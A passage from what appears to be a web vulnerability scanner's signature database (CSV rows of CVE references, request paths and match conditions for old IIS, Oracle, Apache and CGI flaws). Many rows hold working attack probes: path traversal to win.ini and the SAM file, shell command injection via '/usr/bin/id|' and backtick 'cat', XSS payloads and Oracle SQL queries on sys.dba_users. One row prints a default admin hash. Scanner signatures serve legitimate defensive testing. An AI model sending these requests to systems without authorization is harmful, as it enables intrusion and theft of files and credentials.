retrieval.\",\"\",\"\"\n\"003326\",\"CVE-2002-0681\",\"7\",\"/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows/win.ini\",\"GET\",\"@LFI()\",\"GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval, upgrade to the latest version.\",\"\",\"\"\n\"003327\",\"CVE-2002-0681\",\"7\",\"/..%5C..%5C..%5C..%5C..%5C..%5C/Windows/win.ini\",\"GET\",\"@LFI()\",\"GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval.\",\"\",\"\"\n\"003328\",\"CVE-2003-0169\",\"6\",\"/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html\",\"GET\",\"CODE:200\",\"HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.\",\"\",\"\"\n\"003329\",\"CVE-2002-0502\",\"3\",\"/applist.asp\",\"GET\",\"CODE:200\",\"Citrix server may allow remote users to view applications installed without authenticating.\",\"\",\"\"\n\"003330\",\"CVE-2002-0301\",\"3\",\"/launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica\",\"GET\",\"CODE:200\",\"Citrix server may reveal sensitive information by accessing the 'advanced' tab on the login screen.\",\"\",\"\"\n\"003331\",\"https://seclists.org/bugtraq/2003/Nov/226\",\"a\",\"/_layouts/alllibs.htm\",\"GET\",\"CODE:200\",\"Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x.\",\"\",\"\"\n\"003332\",\"https://seclists.org/bugtraq/2003/Nov/226\",\"a\",\"/_layouts/settings.htm\",\"GET\",\"CODE:200\",\"Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x.\",\"\",\"\"\n\"003333\",\"https://seclists.org/bugtraq/2003/Nov/226\",\"a\",\"/_layouts/userinfo.htm\",\"GET\",\"CODE:200\",\"Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x.\",\"\",\"\"\n\"003334\",\"http://freshmeat.net/users/rizen/\",\"8\",\"@CGIDIRSindex.pl\",\"GET\",\"BODY:Powered By WebGUI 4\\.6\\.8\",\"WebGUI version 4.6.8, according to the documentation, may allow arbitrary code execution.\",\"\",\"\"\n\"003335\",\"CVE-2001-1446\",\"3\",\"/.DS_Store\",\"GET\",\"BODY:Bud1\",\"Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.\",\"\",\"\"\n\"003336\",\"CVE-2002-1089\",\"3\",\"@CGIDIRSrwcgi60\",\"GET\",\"CODE:200\",\"Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output\",\"\",\"\"\n\"003337\",\"CVE-2002-1089\",\"3\",\"@CGIDIRSrwcgi60/showenv\",\"GET\",\"CODE:200\",\"Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output\",\"\",\"\"\n\"003338\",\"http://freshmeat.net/users/rizen/\",\"8\",\"@CGIDIRSindex.pl\",\"GET\",\"BODY:Powered By WebGUI 4\\.6\\.9\",\"WebGUI version 4.6.9 has a \\\"very obsure [sic] and unlikely security hole\\\" according to the documentation. .\",\"\",\"\"\n\"003339\",\"http://freshmeat.net/users/rizen/\",\"3\",\"@CGIDIRSindex.pl\",\"GET\",\"BODY:Powered By WebGUI 4\\.5\\.0\",\"WebGUI version 4.5.0 according to the documentation, a user could view collateral data of a wobject if the URL is known.\",\"\",\"\"\n\"003340\",\"CVE-1999-0935\",\"8\",\"@CGIDIRSclassifieds/classifieds.cgi\",\"GET\",\"CODE:200\",\"Mike's Classifieds CGI contains a bug that allows arbitrary command execution on the server (untested).\",\"\",\"\"\n\"003341\",\"CVE-2000-0432\",\"8\",\"@CGIDIRScalendar/index.cgi\",\"GET\",\"CODE:200\",\"Mike's Calendar CGI contains a bug that allows arbitrary command execution (version 1.4).\",\"\",\"\"\n\"003342\",\"CVE-2001-0868\",\"3\",\"/stronghold-info\",\"GET\",\"CODE:200\",\"Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration.\",\"\",\"\"\n\"003343\",\"CVE-2001-0868\",\"3\",\"/stronghold-status\",\"GET\",\"CODE:200\",\"Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information.\",\"\",\"\"\n\"003344\",\"CVE-2000-0759\",\"3\",\"/blah-whatever.jsp\",\"GET\",\"BODY:JSP file \\\"\",\"The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file.\",\"\",\"\"\n\"003345\",\"CVE-2001-0900\",\"7\",\"/gallery/index.php?include=@LFI()\",\"GET\",\"@LFI()\",\"Gallery allows files to be read remotely.\",\"\",\"\"\n\"003346\",\"CVE-2001-0900\",\"7\",\"/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=@LFI()\",\"GET\",\"@LFI()\",\"Gallery Addon for PHP-Nuke allows files to be read remotely.\",\"\",\"\"\n\"003347\",\"CVE-2001-0871\",\"4\",\"@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe\",\"GET\",\"BODY:IP Configuration\",\"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"003348\",\"CVE-2001-0871\",\"4\",\"@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe\",\"GET\",\"BODY:IP Configuration\",\"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"003349\",\"CVE-2001-0871\",\"4\",\"@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe\",\"GET\",\"BODY:IP Configuration\",\"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"003350\",\"CVE-2001-1204\",\"7\",\"/phprocketaddin/?page=@LFI()\",\"GET\",\"@LFI()\",\"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.\",\"\",\"\"\n\"003351\",\"CVE-2001-1199\",\"4\",\"@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Agora.cgi is vulnerable to XSS,\",\"\",\"\"\n\"003352\",\"CVE-1999-0449\",\"6\",\"/iissamples/exair/howitworks/Code.asp\",\"GET\",\"CODE:200\",\"Scripts within the Exair package on IIS 4 can be used for a DoS against the server.\",\"\",\"\"\n\"003353\",\"CVE-1999-0449 MS99-013\",\"6\",\"/iissamples/exair/howitworks/Codebrw1.asp\",\"GET\",\"CODE:200\",\"This is a default IIS script/file which should be removed, it may allow a DoS against the server.\",\"\",\"\"\n\"003354\",\"CVE-1999-0736 MS99-013\",\"7\",\"/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"003355\",\"CVE-2002-2029\",\"4\",\"/pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Oracle 9iAS is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003356\",\"CVE-2002-2029\",\"4\",\"/pls/help/<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Oracle 9iAS is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003357\",\"CVE-2002-0562\",\"3\",\"/demo/ojspext/events/globals.jsa\",\"GET\",\"BODY:event:application_OnStart\",\"Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information.\",\"\",\"\"\n\"003358\",\"CVE-2002-0562\",\"3\",\"/globals.jsa\",\"GET\",\"CODE:200\",\"Oracle globals.jsa file\",\"\",\"\"\n\"003359\",\"CVE-2001-1217\",\"7\",\"/pls/sample/admin_/help/..%255cplsql.conf\",\"GET\",\"BODY:Directives added for mod\\-plsql\",\"Oracle 9iAS allows mod_plsql to perform a directory traversal.\",\"\",\"\"\n\"003360\",\"CVE-2002-0568\",\"3\",\"/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml\",\"GET\",\"BODY:On a PRODUCTION system\",\"Oracle 9iAS configuration file found.\",\"\",\"\"\n\"003361\",\"CVE-2002-0325\",\"7\",\"/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003362\",\"CVE-2002-0325\",\"7\",\"/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003363\",\"CVE-2002-0325\",\"7\",\"/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003364\",\"CVE-2002-0325\",\"7\",\"/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003365\",\"CVE-2002-0325\",\"7\",\"/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003366\",\"CVE-2002-0325\",\"7\",\"/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003367\",\"CVE-2002-0325\",\"7\",\"/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003368\",\"CVE-2002-0325\",\"7\",\"/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003369\",\"CVE-2002-0325\",\"7\",\"/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"003370\",\"CVE-2002-0306\",\"8\",\"/ans.pl?p=../../../../../usr/bin/id|&blah\",\"GET\",\"BODY:uid=\",\"Avenger's News System allows commands to be issued remotely. The default admin string is 'admin:aaLR8vE.jjhss:root@127\\.0\\.0\\.1', and the password file location 'ans_data/ans.passwd'\",\"\",\"\"\n\"003371\",\"CVE-2002-0306\",\"8\",\"/ans/ans.pl?p=../../../../../usr/bin/id|&blah\",\"GET\",\"BODY:uid=\",\"Avenger's News System allows commands to be issued remotely.\",\"\",\"\"\n\"003372\",\"CVE-2002-0495 http://www.cgiscript.net/\",\"8\",\"@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20@LFI(abs)`\",\"GET\",\"@LFI()\",\"csSearch has a major flaw that allows Perl to be executed remotely. Upgrade to a version higher than 2.3.\",\"\",\"\"\n\"003373\",\"MS02-018 CVE-2002-0075\",\"3\",\"/?\\\"><script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"IIS is vulnerable to Cross Site Scripting.\",\"\",\"\"\n\"003374\",\"CVE-2002-0075\",\"3\",\"/@JUNK(10)abcd.html\",\"GET\",\"BODY:\\+ displayresult \\+\",\"The IIS 4.0, 5.0 and 5.1 server may be vulnerable to Cross Site Scripting (XSS) in redirect error messages.\",\"\",\"\"\n\"003375\",\"CVE-1999-0739\",\"6\",\"/iissamples/exair/howitworks/codebrws.asp\",\"GET\",\"BODY:ASP Source code browser\",\"This is a default IIS script/file that should be removed. It may allow a DoS against the server or a DoS. XF-2383.\",\"\",\"\"\n\"003376\",\"CVE-2002-0893\",\"36\",\"/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa\",\"GET\",\"BODY:OBJECT RUNAT=Server\",\"ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp\",\"\",\"\"\n\"003377\",\"CVE-2002-0892\",\"36\",\"/servlet/com.newatlanta.servletexec.JSP10Servlet/\",\"GET\",\"BODY:The file was not found\",\"ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp\",\"\",\"\"\n\"003378\",\"CVE-1999-0739 MS99-013\",\"3\",\"/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp\",\"GET\",\"BODY:Path not found\",\"CodeBrws.asp can be used to determine if a file system path exists or not.\",\"\",\"\"\n\"003379\",\"CVE-1999-0739 MS99-013\",\"5\",\"/iissamples/sdk/asp/docs/codebrws.asp\",\"GET\",\"BODY:View Active Server Page Source\",\"IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed.\",\"\",\"\"\n\"003380\",\"CVE-1999-0739 MS99-013\",\"5\",\"/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp\",\"GET\",\"CODE:200\",\"IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root.\",\"\",\"\"\n\"003381\",\"CVE-2002-0661\",\"7\",\"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini\",\"GET\",\"@LFI()\",\"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above.\",\"\",\"\"\n\"003382\",\"CVE-2002-0661\",\"7\",\"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini\",\"GET\",\"@LFI()\",\"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above.\",\"\",\"\"\n\"003383\",\"CVE-2000-0126 MS01-033\",\"7\",\"/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server.\",\"\",\"\"\n\"003384\",\"CVE-2000-0126 MS01-033\",\"7\",\"/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server.\",\"\",\"\"\n\"003385\",\"CVE-2001-1198\",\"3\",\"/pass_done.php\",\"GET\",\"CODE:200\",\"PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.\",\"\",\"\"\n\"003386\",\"CVE-2001-1198\",\"a\",\"/admin/admin.php?adminpy=1\",\"GET\",\"CODE:200\",\"PY-Membres 4.2 may allow administrator access.\",\"\",\"\"\n\"003387\",\"\",\"1\",\"/iishelp/iis/htm/tutorial/redirect.asp\",\"GET\",\"BODY:A URL is required\",\"Possibly unchecked redirect with url= variable.\",\"\",\"\"\n\"003388\",\"CVE-2002-2006\",\"3\",\"/servlet/SnoopServlet\",\"GET\",\"BODY:Client Information\",\"JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"003389\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/Citrix/PNAgent/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003390\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/Citrix/ICAWEB/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003391\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/IBMWebAS/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003392\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/IBMWebAS/docs/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003393\",\"CWE-552\",\"1\",\"/IBMWebAS/apidocs/\",\"GET\",\"BODY:IBM WebSphere\",\"IBM Websphere documentation found.\",\"\",\"\"\n\"003394\",\"CWE-552\",\"1\",\"/IBMWebAS/configDocs/\",\"GET\",\"BODY:WebSphere Configuration\",\"IBM Websphere documentation found.\",\"\",\"\"\n\"003395\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/IBMWebAS/mbeanDocs/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found. IBM Websphere documentation.\",\"\",\"\"\n\"003396\",\"\",\"1\",\"/iishelp/iis/misc/default.asp\",\"GET\",\"BODY:Microsoft Internet Information Services\",\"Default IIS page found.\",\"\",\"\"\n\"003397\",\"\",\"1\",\"/Citrix/MetaFrameXP/default/login.asp\",\"GET\",\"BODY:MetaFrame XP\",\"Citrix MetaFrame login.\",\"\",\"\"\n\"003398\",\"CWE-552\",\"1\",\"@TOMCATADMINhtml-manager-howto.html\",\"GET\",\"BODY:Application Manager\",\"Tomcat documentation found.\",\"\",\"\"\n\"003399\",\"CWE-552\",\"1\",\"@TOMCATADMINmanager-howto.html\",\"GET\",\"BODY:Manager App\",\"Tomcat documentation found.\",\"\",\"\"\n\"003400\",\"CWE-552\",\"1\",\"/includes/adovbs.inc\",\"GET\",\"BODY:Microsoft ADO\",\"Default Microsoft file found.\",\"\",\"\"\n\"003401\",\"CWE-552\",\"1\",\"/adovbs.inc\",\"GET\",\"BODY:Microsoft ADO\",\"Microsoft default file found.\",\"\",\"\"\n\"003402\",\"\",\"13\",\"/fcgi-bin/echo\",\"GET\",\"BODY:FastCGI echo\",\"The FastCGI echo program may reveal system info or lead to other attacks.\",\"\",\"\"\n\"003403\",\"\",\"13\",\"/fcgi-bin/echo2\",\"GET\",\"BODY:FastCGI echo\",\"The FastCGI echo2 program may reveal system info or lead to other attacks.\",\"\",\"\"\n\"003404\",\"CWE-552\",\"1\",\"/pls/ldc/admin_/\",\"GET\",\"BODY:Gateway Configuration\",\"Oracle Gateway Configuration application.\",\"\",\"\"\n\"003405\",\"CWE-552\",\"1\",\"/demo/basic/simple/viewsrc/welcomeuser.jsp.txt\",\"GET\",\"BODY:WelcomeUser JSP\",\"Default demo code found.\",\"\",\"\"\n\"003406\",\"\",\"13\",\"/README\",\"GET\",\"BODY:OracleJSP\",\"OracleJSP README file found.\",\"\",\"\"\n\"003407\",\"\",\"13\",\"/demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt\",\"GET\",\"BODY:Oracle Corporation\",\"Default Oracle code found.\",\"\",\"\"\n\"003408\",\"\",\"1\",\"/soapdocs/webapps/soap/\",\"GET\",\"BODY:Oracle SOAP\",\"Oracle SOAP application.\",\"\",\"\"\n\"003409\",\"\",\"1\",\"/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml\",\"GET\",\"BODY:SOAP configuration file\",\"SOAP server configuration file.\",\"\",\"\"\n\"003410\",\"CVE-2005-3685\",\"4\",\"/shopadmin.asp?Password=abc&UserName=\\\"><script>alert(foo)</script>\",\"GET\",\"BODY:<script>alert\\(foo\\)<\\/script>\",\"VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS.\",\"\",\"\"\n\"003411\",\"CVE-2005-3388\",\"4\",\"/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\);<\\/script>\",\"PHP contains a flaw that allows a remote cross site scripting attack.\",\"\",\"\"\n\"003412\",\"CVE-2006-1663 CVE-2006-0996\",\"4\",\"/phpinfo.php?cx[]=@JUNK(4096)<script>alert(foo)</script>\",\"GET\",\"BODY:<script>alert\\(foo\\)<\\/script>\",\"PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS\",\"\",\"\"\n\"003413\",\"CWE-552\",\"1\",\"/j2ee/\",\"GET\",\"CODE:200\",\"j2ee directory found--possibly an Oracle app server directory.\",\"\",\"\"\n\"003414\",\"https://web.archive.org/web/20200302202728/https://www.securityfocus.com/bid/4431/discuss\",\"3\",\"@CGIDIRSprintenv.tmp\",\"GET\",\"BODY:DOCUMENT_ROOT\",\"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks.\",\"\",\"\"\n\"003415\",\"https://web.archive.org/web/20200302202728/https://www.securityfocus.com/bid/4431/discuss\",\"1\",\"/perl/printenv\",\"GET\",\"BODY:DOCUMENT_ROOT\",\"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks.\",\"\",\"\"\n\"003416\",\"CWE-552\",\"3\",\"/perl-status\",\"GET\",\"BODY:Embedded Perl\",\"Perl status page found. This may reveal details about the Perl installation and operating system.\",\"\",\"\"\n\"003417\",\"CWE-552\",\"13\",\"/WebCacheDemo.html\",\"GET\",\"CODE:200\",\"Oracle WebCache Demo\",\"\",\"\"\n\"003418\",\"CWE-552\",\"13\",\"/webcache/\",\"GET\",\"CODE:200\",\"Oracle WebCache Demo\",\"\",\"\"\n\"003419\",\"CWE-552\",\"13\",\"/webcache/webcache.xml\",\"GET\",\"CODE:200\",\"Oracle WebCache Demo\",\"\",\"\"\n\"003420\",\"CWE-552\",\"13\",\"/bmp/\",\"GET\",\"CODE:200\",\"SQLJ Demo Application\",\"\",\"\"\n\"003421\",\"CWE-552\",\"13\",\"/bmp/global-web-application.xml\",\"GET\",\"CODE:200\",\"SQLJ Demo Application\",\"\",\"\"\n\"003422\",\"CWE-552\",\"13\",\"/bmp/JSPClient.java\",\"GET\",\"CODE:200\",\"SQLJ Demo Application\",\"\",\"\"\n\"003423\",\"CWE-552\",\"13\",\"/bmp/mime.types\",\"GET\",\"CODE:200\",\"SQLJ Demo Application\",\"\",\"\"\n\"003424\",\"CWE-552\",\"13\",\"/bmp/README.txt\",\"GET\",\"CODE:200\",\"SQLJ Demo Application\",\"\",\"\"\n\"003425\",\"CWE-552\",\"13\",\"/bmp/sqljdemo.jsp\",\"GET\",\"CODE:200\",\"SQLJ Demo Application\",\"\",\"\"\n\"003426\",\"CWE-552\",\"13\",\"/bmp/setconn.jsp\",\"GET\",\"CODE:200\",\"SQLJ Demo Application\",\"\",\"\"\n\"003427\",\"CWE-552\",\"13\",\"/ptg_upgrade_pkg.log\",\"GET\",\"CODE:200\",\"Oracle log files.\",\"\",\"\"\n\"003428\",\"CWE-552\",\"13\",\"/OA_HTML/oam/weboam.log\",\"GET\",\"CODE:200\",\"Oracle log files.\",\"\",\"\"\n\"003429\",\"CWE-552\",\"1\",\"/webapp/admin/_pages/_bc4jadmin/\",\"GET\",\"CODE:200\",\"Oracle JSP files\",\"\",\"\"\n\"003430\",\"CWE-552\",\"1\",\"/_pages/_webapp/_admin/_showpooldetails.java\",\"GET\",\"CODE:200\",\"Oracle JSP files\",\"\",\"\"\n\"003431\",\"CWE-552\",\"1\",\"/_pages/_webapp/_admin/_showjavartdetails.java\",\"GET\",\"CODE:200\",\"Oracle JSP file\",\"\",\"\"\n\"003432\",\"CWE-552\",\"1\",\"/_pages/_demo/\",\"GET\",\"CODE:200\",\"Oracle JSP file\",\"\",\"\"\n\"003433\",\"CWE-552\",\"1\",\"/_pages/_webapp/_jsp/\",\"GET\",\"CODE:200\",\"Oracle JSP file.\",\"\",\"\"\n\"003434\",\"CWE-552\",\"1\",\"/_pages/_demo/_sql/\",\"GET\",\"CODE:200\",\"Oracle JSP file.\",\"\",\"\"\n\"003435\",\"CWE-552\",\"13\",\"/OA_HTML/_pages/\",\"GET\",\"CODE:200\",\"Oracle JSP file.\",\"\",\"\"\n\"003436\",\"CWE-552\",\"13\",\"/OA_HTML/webtools/doc/index.html\",\"GET\",\"CODE:200\",\"Cabo DHTML Components Help Page\",\"\",\"\"\n\"003437\",\"https://www.exploit-db.com/exploits/26006\",\"8\",\"/reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF\",\"GET\",\"CODE:200\",\"Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution\",\"\",\"\"\n\"003438\",\"CWE-552\",\"1\",\"/apex/\",\"GET\",\"CODE:200\",\"Oracle Application Express login screen.\",\"\",\"\"\n\"003439\",\"CWE-552\",\"1b\",\"/OA_JAVA/\",\"GET\",\"CODE:200\",\"Oracle Applications Portal Page\",\"\",\"\"\n\"003440\",\"CWE-552\",\"1b\",\"/OA_HTML/\",\"GET\",\"CODE:200\",\"Oracle Applications Portal Page\",\"\",\"\"\n\"003441\",\"CWE-552\",\"1b\",\"/aplogon.html\",\"GET\",\"CODE:200\",\"Oracle Applications Portal Page\",\"\",\"\"\n\"003442\",\"CWE-552\",\"1b\",\"/appdet.html\",\"GET\",\"CODE:200\",\"Oracle Applications Portal Pages\",\"\",\"\"\n\"003443\",\"CWE-552\",\"1b\",\"/servlets/weboam/oam/oamLogin\",\"GET\",\"CODE:200\",\"Oracle Application Manager\",\"\",\"\"\n\"003444\",\"CWE-552\",\"1b\",\"/OA_HTML/PTB/mwa_readme.htm\",\"GET\",\"CODE:200\",\"Oracle Mobile Applications Industrial Server administration and configuration interface\",\"\",\"\"\n\"003445\",\"CWE-552\",\"1b\",\"/reports/rwservlet\",\"GET\",\"CODE:200\",\"Oracle Reports\",\"\",\"\"\n\"003446\",\"CWE-552\",\"1b\",\"/reports/rwservlet/showenv\",\"GET\",\"CODE:200\",\"Oracle Reports\",\"\",\"\"\n\"003447\",\"CWE-552\",\"1b\",\"/reports/rwservlet/showmap\",\"GET\",\"CODE:200\",\"Oracle Reports\",\"\",\"\"\n\"003448\",\"CWE-552\",\"1b\",\"/reports/rwservlet/showjobs\",\"GET\",\"CODE:200\",\"Oracle Reports\",\"\",\"\"\n\"003449\",\"CWE-552\",\"1b\",\"/reports/rwservlet/getjobid7?server=myrep\",\"GET\",\"CODE:200\",\"Oracle Reports\",\"\",\"\"\n\"003450\",\"CWE-552\",\"1b\",\"/reports/rwservlet/getjobid4?server=myrep\",\"GET\",\"CODE:200\",\"Oracle Reports\",\"\",\"\"\n\"003451\",\"CWE-552\",\"1b\",\"/reports/rwservlet/showmap?server=myserver\",\"GET\",\"CODE:200\",\"Oracle Reports\",\"\",\"\"\n\"003452\",\"\",\"1a\",\"/pls/portal/owa_util.cellsprint?p_theQuery=select\",\"GET\",\"CODE:200\",\"Direct access to Oracle packages could have an unknown impact.\",\"\",\"\"\n\"003453\",\"\",\"1a\",\"/pls/portal/owa_util.listprint?p_theQuery=select\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003454\",\"\",\"1a\",\"/pls/portal/owa_util.show_query_columns?ctable=sys.dba_users\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003455\",\"\",\"1a\",\"/pls/portal/owa_util.showsource?cname=owa_util\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003456\",\"\",\"1a\",\"/pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003457\",\"\",\"1a\",\"/pls/portal/owa_util.signature\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003458\",\"\",\"1a\",\"/pls/portal/HTP.PRINT\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003459\",\"\",\"1a\",\"/pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003460\",\"\",\"1a\",\"/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003461\",\"\",\"1a\",\"/pls/portal/PORTAL.wwv_form.genpopuplist\",\"GET\",\"CODE:200\",\"Access to Oracle pages cold have an unknown impact.\",\"\",\"\"\n\"003462\",\"\",\"1a\",\"/pls/portal/PORTAL.wwv_ui_lovf.show\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003464\",\"\",\"1a\",\"/pls/portal/PORTAL.wwv_dynxml_generator.show\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003465\",\"\",\"1a\",\"/pls/portal/PORTAL.home\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003467\",\"\",\"1a\",\"/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003468\",\"\",\"1a\",\"/pls/portal/SELECT\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown 